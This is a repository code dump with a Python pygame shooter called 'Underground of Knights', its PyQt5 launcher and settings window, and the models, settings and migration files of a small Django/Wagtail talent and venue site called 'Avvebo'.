    def __init__(self, space, x, y):
        """Creates the wall at grid cell (x, y)."""
        super().__init__(space, x, y)
        # 'wall\\wall.jpg': previously written 'wall\wall.jpg' with the
        # invalid escape sequence '\w' (SyntaxWarning on modern Python);
        # the string value is unchanged.
        self.set_image(space.game.load_image('wall\\wall.jpg'))
        self.add(space.walls_group)
class Tile(GameObject):
    '''
    Walkable floor tile.
    '''

    def __init__(self, space, x, y):
        """Places a floor tile at grid cell (x, y)."""
        super().__init__(space, x, y)
        texture = space.game.load_image('tile\\tile_1.png')
        self.set_image(texture)
        self.add(space.tiles_group)
class TransitionalPortal(GameObject):
    '''
    Exit portal that leads to the next level.
    '''

    def __init__(self, space, x, y):
        """Places the portal at grid cell (x, y)."""
        super().__init__(space, x, y)
        sprite_image = space.game.load_image('transitional portal\\std.png', -1)
        self.set_image(sprite_image)
        self.add(space.transitional_portal_group)
class Item(GameObject):
    '''
    Base class for pick-up items (weapons, armor, trinkets).
    '''

    def __init__(self, gamespace, x, y):
        """Creates the item at grid cell (x, y) with a placeholder image."""
        super().__init__(gamespace, x, y)
        # BUG FIX: size_cell // 1.5 yields a float; pygame.Surface requires
        # integer dimensions, so coerce explicitly (the value is unchanged,
        # // already floors).
        default_image = pygame.Surface(size=[int(gamespace.size_cell // 1.5)] * 2)
        default_image.fill(pygame.color.Color('purple'))  # placeholder picture
        self.image = default_image
        self.rect = self.image.get_rect().move(self.true_x, self.true_y)
        self.add(gamespace.items_group)
        self.type_item = "none"  # item category / equipment slot
        self.armor = 0  # armor bonus
        self.sprint_speed = 0  # speed bonus
        self.is_taken = False  # whether a hero currently carries the item
        self.icon_image = self.image.copy()  # HUD icon

    def set_image(self, image):
        """Installs the image and keeps it as the HUD icon."""
        super().set_image(image)
        self.icon_image = self.image

    def set_taken(self):
        """Marks the item as carried and makes its world sprite invisible."""
        self.is_taken = True
        image = pygame.Surface(size=(10, 10))
        # a fresh surface is uniformly one colour, so keying on pixel (0, 0)
        # makes the whole sprite transparent
        image.set_colorkey(image.get_at((0, 0)))
        self.image = image

    def put(self, x, y):
        """Drops the item at pixel coordinates (x, y)."""
        self.is_taken = False
        self.image = self.icon_image
        self.set_coordinates(x, y)
class Weapon(Item):
    '''
    A weapon item: fires projectiles, costs energy, has a cooldown.
    '''

    def __init__(self, gamespace, x, y, name, damage=1, speed_attack=1.0, bullet=None, energy_requirement=1):
        """Creates the weapon at grid cell (x, y) with the given stats."""
        super().__init__(gamespace, x, y)
        self.type_item = "weapon"  # equipment slot
        self.weapon_name = name  # display name
        self.damage = damage  # damage per shot
        self.bullet = bullet  # projectile class (None -> default Bullet)
        self.attack_readiness = 1  # cooldown progress, 1 means ready
        self.speed_attack = speed_attack  # shots per second
        self.energy_efficiency = energy_requirement  # energy cost per shot

    def attack(self, sender, x_cur, y_cur):
        """Fires a projectile from sender toward (x_cur, y_cur)."""
        if sender.energy < self.energy_efficiency:
            return  # not enough energy to fire
        if self.attack_readiness < 1:
            return  # still on cooldown
        # spawn the configured projectile, falling back to the default Bullet
        projectile = Bullet if self.bullet is None else self.bullet
        projectile(self.gamespace, sender, (x_cur, y_cur), self.damage)
        # restart the cooldown and the sender's energy-regeneration delay
        self.attack_readiness = 0
        sender.readiness_recovery_energy = 0
        # pay the energy cost
        sender.energy -= self.energy_efficiency

    def update(self, *args):
        """Advances the cooldown by the elapsed time args[0] (ms), capped at 1."""
        self.attack_readiness = min(1, self.attack_readiness + self.speed_attack * args[0] / 1000)
class Bullet(GameObject):
    '''
    A projectile travelling in a straight line from sender toward a point.
    '''

    def __init__(self, gamespace, sender, pos_finish, damage, k_speed=1):
        """Spawns the bullet at sender's centre, aimed at pos_finish."""
        super().__init__(gamespace, 0, 0)
        default_image = pygame.Surface(size=[gamespace.size_cell // 4] * 2)
        default_image.fill(pygame.color.Color("red"))
        self.image = default_image
        self.rect = self.image.get_rect().move(
            sender.true_x + gamespace.size_cell // 2 - default_image.get_width() // 2,
            sender.true_y + gamespace.size_cell // 2 - default_image.get_height() // 2)
        self.set_coordinates(sender.true_x + gamespace.size_cell // 2 - default_image.get_width() // 2,
                             sender.true_y + gamespace.size_cell // 2 - default_image.get_height() // 2)
        self.add(gamespace.bullets_group)
        self.damage = damage  # damage dealt on hit
        self.sender = sender  # who fired the bullet (never damaged by it)
        self.k_speed = k_speed  # flight speed multiplier
        # compute the flight direction (unit vector vx, vy)
        try:
            angle = atan(((pos_finish[1] - self.image.get_height() / 2) - self.true_y) /
                         ((pos_finish[0] - self.image.get_width() / 2) - self.true_x))
            self.vx = cos(angle)
            self.vy = sin(angle)
            if pos_finish[0] - self.image.get_width() / 2 < self.true_x:
                # atan() folds the left half-plane onto the right; mirror back
                self.vx *= -1
                self.vy *= -1
        except ZeroDivisionError:
            # strictly vertical shot
            self.vx = 0
            self.vy = copysign(1, (pos_finish[1] - self.image.get_height() / 2) - self.true_y)

    def update(self, *args):
        """Advances the bullet; applies damage and despawns on impact."""
        self.true_x += args[0] / 1000 * self.gamespace.size_cell * self.vx * self.k_speed
        self.true_y += args[0] / 1000 * self.gamespace.size_cell * self.vy * self.k_speed
        self.rect.x, self.rect.y = int(self.true_x), int(self.true_y)
        # collect heroes this bullet may damage (never the sender's own group)
        heroes = ((pygame.sprite.spritecollide(self, self.gamespace.enemies_group, False)
                   if self.sender not in self.gamespace.enemies_group else []) +
                  (pygame.sprite.spritecollide(self, self.gamespace.player_group, False)
                   if self.sender not in self.gamespace.player_group else []))
        heroes.remove(self.sender) if self.sender in heroes else None
        if heroes:
            for sprite in heroes:
                # deal damage to everything hit
                sprite.half_damage(self.damage)
            self.kill()  # the bullet is spent
        elif pygame.sprite.spritecollideany(self, self.gamespace.walls_group, False):
            self.kill()  # bullets vanish when they hit a wall
class Camera:
    """Keeps a scroll offset (dx, dy) that centres the view on a target sprite."""

    def __init__(self, gamespace):
        """Start with a zero offset; keep the game space for screen dimensions."""
        self.gamespace = gamespace
        self.dx = 0
        self.dy = 0

    def apply(self, obj):
        """Shift ``obj`` — both its rect and its float coordinates — by the offset."""
        obj.rect.x = obj.rect.x + self.dx
        obj.rect.y = obj.rect.y + self.dy
        obj.true_x = obj.true_x + self.dx
        obj.true_y = obj.true_y + self.dy

    def update(self, target):
        """Recompute the offset so that ``target`` sits in the screen centre."""
        screen = self.gamespace.game
        target_centre_x = target.rect.x + target.rect.w // 2
        target_centre_y = target.rect.y + target.rect.h // 2
        self.dx = screen.width // 2 - target_centre_x
        self.dy = screen.height // 2 - target_centre_y
class StdItems:
    """Standard items: the stock weapons and armour sets."""
    class WeaponStaff(Weapon):
        # Staff: slow fire rate, high damage, expensive to shoot.
        def __init__(self, gamespace, x, y):
            super().__init__(gamespace, x, y, "Посох", damage=150, speed_attack=0.5, bullet=StdBullets.BlueBall,
                             energy_requirement=25)
            self.set_image(gamespace.game.load_image("weapon\\staff.png", -1))
    class WeaponShuriken(Weapon):
        # Shurikens: very fast, low damage, cheap to throw.
        def __init__(self, gamespace, x, y):
            super().__init__(gamespace, x, y, "Сюрикены", damage=8, speed_attack=10, bullet=StdBullets.Shuriken,
                             energy_requirement=2)
            self.set_image(gamespace.game.load_image("weapon\\shuriken.png", -1))
    class WeaponPistol(Weapon):
        # Pistol: balanced damage, rate of fire and energy cost.
        def __init__(self, gamespace, x, y):
            super().__init__(gamespace, x, y, "Пистолет", damage=35, speed_attack=3, bullet=StdBullets.RedBall,
                             energy_requirement=5)
            self.set_image(gamespace.game.load_image("weapon\\pistol.png", -1))
    all_weapons = [WeaponStaff, WeaponShuriken, WeaponPistol]  # Every standard weapon
    class HeavyArmor(Item):
        # Heavy armour: best protection, biggest sprint penalty.
        def __init__(self, gamespace, x, y):
            super().__init__(gamespace, x, y)
            self.type_item = "armor"
            self.armor = 600
            self.sprint_speed = -2.5
            self.set_image(gamespace.game.load_image("armor\\heavy armor.png", -1))
    class MediumArmor(Item):
        # Medium armour: middling protection and sprint penalty.
        def __init__(self, gamespace, x, y):
            super().__init__(gamespace, x, y)
            self.type_item = "armor"
            self.armor = 350
            self.sprint_speed = -1.5
            self.set_image(gamespace.game.load_image("armor\\medium armor.png", -1))
    class LightArmor(Item):
        # Light armour: least protection, slightly speeds up sprinting.
        def __init__(self, gamespace, x, y):
            super().__init__(gamespace, x, y)
            self.type_item = "armor"
            self.armor = 100
            self.sprint_speed = 0.5
            self.set_image(gamespace.game.load_image("armor\\light armor.png", -1))
    all_armors = [HeavyArmor, MediumArmor, LightArmor]  # Every standard armour
    all_items = all_weapons + all_armors  # Every standard item
class StdBullets:
    """Standard projectile types used by the stock weapons."""
    # NOTE(review): each subclass repeats Bullet.__init__'s placeholder-image
    # and re-centring logic with its own placeholder size before swapping in
    # the real sprite via set_image.  The flight direction was already fixed
    # in Bullet.__init__ from the original placeholder position, so this
    # duplication is not a pure no-op — verify behaviour before simplifying.
    class BlueBall(Bullet):
        # Blue ball: staff projectile (speed multiplier 3).
        def __init__(self, gamespace, sender, pos_finish, damage):
            super().__init__(gamespace, sender, pos_finish, damage, 3)
            default_image = pygame.Surface(size=[gamespace.size_cell // 4] * 2)
            default_image.fill(pygame.color.Color("red"))
            self.image = default_image
            self.rect = self.image.get_rect().move(
                sender.true_x + gamespace.size_cell // 2 - default_image.get_width() // 2,
                sender.true_y + gamespace.size_cell // 2 - default_image.get_height() // 2)
            self.set_coordinates(sender.true_x + gamespace.size_cell // 2 - default_image.get_width() // 2,
                                 sender.true_y + gamespace.size_cell // 2 - default_image.get_height() // 2)
            self.set_image(gamespace.game.load_image("bullet\\blue ball.png", -1))
    class Shuriken(Bullet):
        # Shuriken: thrown projectile (speed multiplier 6).
        def __init__(self, gamespace, sender, pos_finish, damage):
            super().__init__(gamespace, sender, pos_finish, damage, 6)
            default_image = pygame.Surface(size=[gamespace.size_cell // 6] * 2)
            default_image.fill(pygame.color.Color("red"))
            self.image = default_image
            self.rect = self.image.get_rect().move(
                sender.true_x + gamespace.size_cell // 2 - default_image.get_width() // 2,
                sender.true_y + gamespace.size_cell // 2 - default_image.get_height() // 2)
            self.set_coordinates(sender.true_x + gamespace.size_cell // 2 - default_image.get_width() // 2,
                                 sender.true_y + gamespace.size_cell // 2 - default_image.get_height() // 2)
            self.set_image(gamespace.game.load_image("bullet\\shuriken.png", -1))
    class RedBall(Bullet):
        # Red ball: pistol round (speed multiplier 10).
        def __init__(self, gamespace, sender, pos_finish, damage):
            super().__init__(gamespace, sender, pos_finish, damage, 10)
            default_image = pygame.Surface(size=[gamespace.size_cell // 8] * 2)
            default_image.fill(pygame.color.Color("red"))
            self.image = default_image
            self.rect = self.image.get_rect().move(
                sender.true_x + gamespace.size_cell // 2 - default_image.get_width() // 2,
                sender.true_y + gamespace.size_cell // 2 - default_image.get_height() // 2)
            self.set_coordinates(sender.true_x + gamespace.size_cell // 2 - default_image.get_width() // 2,
                                 sender.true_y + gamespace.size_cell // 2 - default_image.get_height() // 2)
            self.set_image(gamespace.game.load_image("bullet\\red ball.png", -1))
    all_bullets = [BlueBall, Shuriken, RedBall]  # Every standard projectile
if __name__ == '__main__':
    # Entry point: build the game and run its main loop.
    GameExample().mainloop()
<file_sep>/run.sh
python "Game Launcher.py"<file_sep>/SettingsForm.py
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'SettingsForm.ui'
#
# Created by: PyQt5 UI code generator 5.13.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
    """Qt Designer form for the launcher window.

    NOTE(review): besides the generated widgets this class also contains
    hand-added widgets (background_image, btn_play, btn_open_settings,
    btn_close) even though the file header warns that changes are lost on
    regeneration — regenerate with care.
    """
    def setupUi(self, MainWindow):
        # Fixed-size 640x360 window.
        MainWindow.setObjectName("MainWindow")
        MainWindow.resize(640, 360)
        MainWindow.setMinimumSize(QtCore.QSize(640, 360))
        MainWindow.setMaximumSize(QtCore.QSize(640, 360))
        MainWindow.setWindowOpacity(1.0)
        # Background label (hand-added; the pixmap is set by the caller).
        self.background_image = QtWidgets.QLabel(MainWindow)
        self.centralwidget = QtWidgets.QWidget(MainWindow)
        self.centralwidget.setObjectName("centralwidget")
        # Settings grid: music volume, resolution, fullscreen, level package.
        self.gridLayoutWidget = QtWidgets.QWidget(self.centralwidget)
        self.gridLayoutWidget.setGeometry(QtCore.QRect(10, 0, 621, 261))
        self.gridLayoutWidget.setObjectName("gridLayoutWidget")
        self.gridLayoutSettings = QtWidgets.QGridLayout(self.gridLayoutWidget)
        self.gridLayoutSettings.setContentsMargins(0, 0, 0, 0)
        self.gridLayoutSettings.setObjectName("gridLayoutSettings")
        self.label_packege = QtWidgets.QLabel(self.gridLayoutWidget)
        self.label_packege.setObjectName("label_packege")
        self.gridLayoutSettings.addWidget(self.label_packege, 3, 0, 1, 1)
        self.label_matrix = QtWidgets.QLabel(self.gridLayoutWidget)
        self.label_matrix.setObjectName("label_matrix")
        self.gridLayoutSettings.addWidget(self.label_matrix, 1, 0, 1, 1)
        self.label_music = QtWidgets.QLabel(self.gridLayoutWidget)
        self.label_music.setObjectName("label_music")
        self.gridLayoutSettings.addWidget(self.label_music, 0, 0, 1, 1)
        self.comboBoxPackages = QtWidgets.QComboBox(self.gridLayoutWidget)
        self.comboBoxPackages.setObjectName("comboBoxPackages")
        self.gridLayoutSettings.addWidget(self.comboBoxPackages, 3, 1, 1, 1)
        self.slider_volume_music = QtWidgets.QSlider(self.gridLayoutWidget)
        self.slider_volume_music.setMaximum(100)
        self.slider_volume_music.setOrientation(QtCore.Qt.Horizontal)
        self.slider_volume_music.setObjectName("slider_volume_music")
        self.gridLayoutSettings.addWidget(self.slider_volume_music, 0, 1, 1, 1)
        self.comboBoxMatrix = QtWidgets.QComboBox(self.gridLayoutWidget)
        self.comboBoxMatrix.setObjectName("comboBoxMatrix")
        self.gridLayoutSettings.addWidget(self.comboBoxMatrix, 1, 1, 1, 1)
        self.checkBoxFullScreen = QtWidgets.QCheckBox(self.gridLayoutWidget)
        self.checkBoxFullScreen.setText("")
        self.checkBoxFullScreen.setObjectName("checkBoxFullScreen")
        self.gridLayoutSettings.addWidget(self.checkBoxFullScreen, 2, 1, 1, 1)
        self.label_fullscreen = QtWidgets.QLabel(self.gridLayoutWidget)
        self.label_fullscreen.setObjectName("label_fullscreen")
        self.gridLayoutSettings.addWidget(self.label_fullscreen, 2, 0, 1, 1)
        # Save / cancel row shown with the settings view.
        self.horizontalLayoutWidget = QtWidgets.QWidget(self.centralwidget)
        self.horizontalLayoutWidget.setGeometry(QtCore.QRect(450, 280, 181, 31))
        self.horizontalLayoutWidget.setObjectName("horizontalLayoutWidget")
        self.horizontalLayoutSaveCancel = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget)
        self.horizontalLayoutSaveCancel.setContentsMargins(0, 0, 0, 0)
        self.horizontalLayoutSaveCancel.setObjectName("horizontalLayoutSaveCancel")
        self.btn_save = QtWidgets.QPushButton(self.horizontalLayoutWidget)
        self.btn_save.setObjectName("btn_save")
        self.horizontalLayoutSaveCancel.addWidget(self.btn_save)
        self.btn_cancel = QtWidgets.QPushButton(self.horizontalLayoutWidget)
        self.btn_cancel.setObjectName("btn_cancel")
        self.horizontalLayoutSaveCancel.addWidget(self.btn_cancel)
        # Main-menu buttons (hand-added, positioned absolutely).
        self.btn_play = QtWidgets.QPushButton("Играть", MainWindow)
        self.btn_play.move(500, 220)
        self.btn_open_settings = QtWidgets.QPushButton("Настройки", MainWindow)
        self.btn_open_settings.move(500, 260)
        self.btn_close = QtWidgets.QPushButton("Выйти", MainWindow)
        self.btn_close.move(500, 300)
        MainWindow.setCentralWidget(self.centralwidget)
        self.menubar = QtWidgets.QMenuBar(MainWindow)
        self.menubar.setGeometry(QtCore.QRect(0, 0, 640, 21))
        self.menubar.setObjectName("menubar")
        MainWindow.setMenuBar(self.menubar)
        self.statusbar = QtWidgets.QStatusBar(MainWindow)
        self.statusbar.setObjectName("statusbar")
        MainWindow.setStatusBar(self.statusbar)
        self.retranslateUi(MainWindow)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)
    def retranslateUi(self, MainWindow):
        # Apply the (Russian) display texts to all labelled widgets.
        _translate = QtCore.QCoreApplication.translate
        MainWindow.setWindowTitle(_translate("MainWindow", "Game Launcher \"Underground of Knights\""))
        self.label_packege.setText(_translate("MainWindow", "<html><head/><body><p><span style=\" color:#ffffff;\">Набор уровней</span></p></body></html>"))
        self.label_matrix.setText(_translate("MainWindow", "<html><head/><body><p><span style=\" color:#ffffff;\">Разрешение экрана</span></p></body></html>"))
        self.label_music.setText(_translate("MainWindow", "<html><head/><body><p><span style=\" color:#ffffff;\">Музыка .o0</span></p></body></html>"))
        self.label_fullscreen.setText(_translate("MainWindow", "<html><head/><body><p><span style=\" color:#ffffff;\">Полноэкранный режим</span></p></body></html>"))
        self.btn_save.setText(_translate("MainWindow", "сохранить"))
        self.btn_cancel.setText(_translate("MainWindow", "отмена"))
        self.btn_play.setText(_translate("MainWindow", "Играть"))
        self.btn_close.setText(_translate("MainWindow", "Выйти"))
        self.btn_open_settings.setText(_translate("MainWindow", "Настройки"))
import sys
import os
from PyQt5.QtWidgets import QApplication, QMainWindow
from PyQt5.QtGui import QPixmap
from SettingsForm import Ui_MainWindow
from win32api import GetSystemMetrics
import run
class SettingsWindow(QMainWindow, Ui_MainWindow):
    """Launcher window hosting both the main menu and the settings form."""

    def __init__(self):
        """Build the UI, wire up the buttons and open the main menu."""
        super().__init__()
        self.setupUi(self)  # Load the generated form
        # Connect the buttons to their handlers.
        self.btn_save.clicked.connect(self.save)  # Save settings
        self.btn_cancel.clicked.connect(self.open_main_menu)  # Cancel
        self.btn_play.clicked.connect(self.play)  # Play
        self.btn_open_settings.clicked.connect(self.open_settings)  # Settings
        self.btn_close.clicked.connect(self.close)  # Quit
        # Set the background image.
        # (Escape fix: "data\images..." relied on Python keeping the invalid
        # escape "\i" literally; the doubled backslash has the same value.)
        self.background_image.setPixmap(QPixmap("data\\images\\background menu.png").scaled(self.size()))
        self.background_image.resize(self.size())
        # Start on the main menu.
        self.open_main_menu()

    def play(self):
        """Hide the launcher and start the game."""
        self.hide()
        run.GameExample().mainloop()

    def _set_settings_visible(self, visible):
        """Show or hide every widget belonging to the settings form."""
        for row in range(self.gridLayoutSettings.rowCount()):
            for col in range(self.gridLayoutSettings.columnCount()):
                item = self.gridLayoutSettings.itemAtPosition(row, col)
                if item is not None:
                    item.widget().setVisible(visible)
        self.btn_save.setVisible(visible)
        self.btn_cancel.setVisible(visible)

    def _set_menu_visible(self, visible):
        """Show or hide the main-menu buttons."""
        self.btn_play.setVisible(visible)
        self.btn_open_settings.setVisible(visible)
        self.btn_close.setVisible(visible)

    def open_main_menu(self):
        """Switch from the settings form back to the main menu."""
        self._set_settings_visible(False)
        self._set_menu_visible(True)

    def open_settings(self):
        """Switch to the settings form, pre-filled from the settings file."""
        self.load_settings()  # Load current values from 'data\settings data'
        self._set_settings_visible(True)
        self._set_menu_visible(False)

    def load_settings(self):
        """Load current settings from file (or defaults) into the form widgets."""
        try:
            # Use a previously saved settings file when one exists.
            with open('data\\settings data', encoding='utf8') as file:
                data = file.readlines()
        except FileNotFoundError:
            # Otherwise fall back to the built-in defaults.
            data = ['matrix 640x360', 'fullscreen true', 'volume 0.5', 'package std']
        # Available level packages = sub-directories of data/levels.
        packages = [name for name in os.listdir('data/levels')
                    if os.path.isdir(f'data/levels/{name}')]
        self.comboBoxPackages.clear()
        for package in packages:
            self.comboBoxPackages.addItem(package)
        # Resolutions that fit on this machine's screen.
        matrixs = ["7680x4320", "5120x2880", "3200x1800", "1920x1080", "1280x720", "640x360"]
        matrixs = [m for m in matrixs
                   if int(m.split('x')[0]) <= GetSystemMetrics(0) and
                   int(m.split('x')[1]) <= GetSystemMetrics(1)]
        self.comboBoxMatrix.clear()
        for matrix in matrixs:
            self.comboBoxMatrix.addItem(matrix)
        # Apply the stored "key value" pairs to the widgets.
        for line in data:
            key, val = line.split()
            if key == 'matrix':  # Screen resolution
                if val in matrixs:
                    self.comboBoxMatrix.setCurrentIndex(matrixs.index(val))
            elif key == 'fullscreen':  # Full-screen mode
                self.checkBoxFullScreen.setChecked(val == 'true')
            elif key == 'volume':  # Music volume (stored as 0.0-1.0)
                self.slider_volume_music.setValue(int(float(val) * 100))
            elif key == 'package':  # Level package
                if val in packages:
                    self.comboBoxPackages.setCurrentIndex(packages.index(val))

    def save(self):
        """Write the chosen settings to the settings file and return to the menu."""
        with open('data\\settings data', encoding='utf8', mode='w') as file:
            file.write(f'matrix {self.comboBoxMatrix.currentText()}\n')
            file.write(f'fullscreen {"true" if self.checkBoxFullScreen.isChecked() else "false"}\n')
            file.write(f'volume {self.slider_volume_music.value() / 100}\n')
            file.write(f'package {self.comboBoxPackages.currentText()}')
        self.open_main_menu()
if __name__ == '__main__':
    # Launch the Qt application with the launcher/settings window.
    app = QApplication(sys.argv)
    window = SettingsWindow()
    window.show()
    app.exec_()
| 6e257335f5b6c1e4e59318c197ba4b40dca76509 | [
"Markdown",
"Python",
"Shell"
] | 5 | Markdown | Permyak-Logy/Underground-of-Knights | 18187a56fda1c0416115789bdf0c37696ae6732e | 74db46d84751767613016d14c7599cb405f80bee |
refs/heads/master | <repo_name>gmar1274/Avvebo<file_sep>/src/Avvebo/website/admin.py
from django.contrib import admin
import Avvebo.website.models as mods
# Register your models here.
# Every application model is exposed in the Django admin with the default ModelAdmin.
myModels=[mods.User,mods.Venue,mods.SocialMedia,mods.TalentContent,mods.AvveboProfile]
admin.site.register(myModels)
<file_sep>/src/Avvebo/settings.py
"""
Django settings for Avvebo project.
Generated by 'django-admin startproject' using Django 2.1.5.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
from django.conf.global_settings import AUTH_USER_MODEL, EMAIL_HOST, EMAIL_HOST_USER, EMAIL_HOST_PASSWORD, EMAIL_PORT, EMAIL_USE_SSL,\
EMAIL_USE_TLS
#from Avvebo.website.models import User
#from Avvebo.website.models import AvveboProfile
EMAIL_HOST_USER='<EMAIL>'
EMAIL_HOST_PASSWORD=''
EMAIL_HOST ='smtp-mail.outlook.com'
EMAIL_PORT=25
EMAIL_USE_TLS=True
EMAIL_USE_SSL=False
WAGTAIL_SITE_NAME = 'Avvebo'
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
DATA_DIR = os.path.dirname(os.path.dirname(__file__))
#AUTH
#AUTH_PROFILE_MODULE = 'Avvebo.website.models.AvveboProfile'
#AUTH_USER_MODEL = 'Avvebo.website.models.User'
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
#BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
#STATIC_ROOT = os.path.join(BASE_DIR, "static")
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
#MEDIA_ROOT = os.path.join(DATA_DIR, 'media')
#STATIC_ROOT = os.path.join(DATA_DIR, 'static')
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'website', 'static'),
)
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '<KEY>'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admindocs',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'Avvebo.website',
'wagtail.contrib.forms',
'wagtail.contrib.redirects',
'wagtail.embeds',
'wagtail.sites',
'wagtail.users',
'wagtail.snippets',
'wagtail.documents',
'wagtail.images',
'wagtail.search',
'wagtail.admin',
'wagtail.core',
'modelcluster',
'taggit',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.cache.CacheMiddleware',
'django.contrib.admindocs.middleware.XViewMiddleware',
'wagtail.core.middleware.SiteMiddleware',
'wagtail.contrib.redirects.middleware.RedirectMiddleware',
]
ROOT_URLCONF = 'Avvebo.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'website', 'templates'),
os.path.join(BASE_DIR, 'Avvebo','website', 'templates', 'colorlib'),#this works
os.path.join(BASE_DIR, 'Avvebo','website', 'mytemplates'),
os.path.join(BASE_DIR, 'Avvebo','website', 'templates', 'startbootstrapadmin'),#this works
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'Avvebo.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
#CACHE_BACKEND='db://my_cache_table'
#MESSAGE_STORAGE = 'django.contrib.messages.storage.cookie.CookieStorage'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
<file_sep>/src/Avvebo/website/models.py
from django.db import models
from django.contrib.auth.models import User as DjangoUser
# makemigrations
# then migrate
# Create your models here.
class AvveboProfile(models.Model):
    # Profile record attached (via FK) to Django's built-in auth User.
    user = models.ForeignKey(DjangoUser,on_delete=models.CASCADE)
class User(models.Model):
    """Application user / talent profile (distinct from django.contrib.auth's User)."""
    name = models.CharField(max_length=50)
    username = models.CharField(max_length=50, primary_key=True)
    reward_points = models.IntegerField(default=0)
    member_since = models.DateField(auto_now_add=True)
    # NOTE(review): 'id' is an external API identifier, not the primary key
    # ('username' is) — a confusing field name worth revisiting.
    id = models.CharField(max_length=50, unique=True, null=False) # api_id string
    pic_url = models.CharField(max_length=50)
    isTalent = models.BooleanField(default=False)
    isActive = models.BooleanField(default=False)
    def __str__(self): # __unicode__ on Python 2
        return self.id
class SocialMedia(models.Model):
    """A social-media link belonging to a talent (User)."""
    talent = models.ForeignKey(User, on_delete=models.CASCADE)
    url = models.CharField(max_length=80)

    def __str__(self):
        # Fix: __str__ must return a string.  Previously this returned the
        # related User instance itself, which raises TypeError whenever
        # Django renders the object (e.g. in the admin change list).
        return str(self.talent)
class TalentContent(models.Model):
    """A piece of video content uploaded by a talent."""
    talent = models.ForeignKey(User, on_delete=models.CASCADE)
    video_url = models.CharField(max_length=50)
    date_uploaded = models.DateField(auto_now_add=True)
    def __str__(self):
        return self.video_url
class Venue(models.Model):
    """A venue account, keyed by its external API identifier."""
    id = models.CharField(max_length=50, primary_key=True)
    member_since = models.DateField(auto_now_add=True)
    name = models.CharField(max_length=50)
    def __str__(self):
        return self.id
<file_sep>/src/Avvebo/website/migrations/0001_initial.py
# Generated by Django 2.1.5 on 2019-01-16 00:11
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated initial migration for the website app.

    Creates the SocialMedia, TalentContent, User and Venue tables, then adds
    the 'talent' foreign keys once 'website.User' exists.  Do not edit by
    hand; generate follow-up migrations instead.
    """
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='SocialMedia',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('url', models.CharField(max_length=80)),
            ],
        ),
        migrations.CreateModel(
            name='TalentContent',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('video_url', models.CharField(max_length=50)),
                ('date_uploaded', models.DateField(auto_now_add=True)),
            ],
        ),
        migrations.CreateModel(
            name='User',
            fields=[
                ('name', models.CharField(max_length=50)),
                ('username', models.CharField(max_length=50, primary_key=True, serialize=False)),
                ('reward_points', models.IntegerField(default=0)),
                ('member_since', models.DateField(auto_now_add=True)),
                ('id', models.CharField(max_length=50, unique=True)),
                ('pic_url', models.CharField(max_length=50)),
                ('isTalent', models.BooleanField(default=False)),
            ],
        ),
        migrations.CreateModel(
            name='Venue',
            fields=[
                ('id', models.CharField(max_length=50, primary_key=True, serialize=False)),
                ('member_since', models.DateField(auto_now_add=True)),
                ('name', models.CharField(max_length=50)),
            ],
        ),
        migrations.AddField(
            model_name='talentcontent',
            name='talent',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='website.User'),
        ),
        migrations.AddField(
            model_name='socialmedia',
            name='talent',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='website.User'),
        ),
    ]
<file_sep>/src/Avvebo/website/views.py
from django.shortcuts import render
from django.forms import *
from django.conf import settings
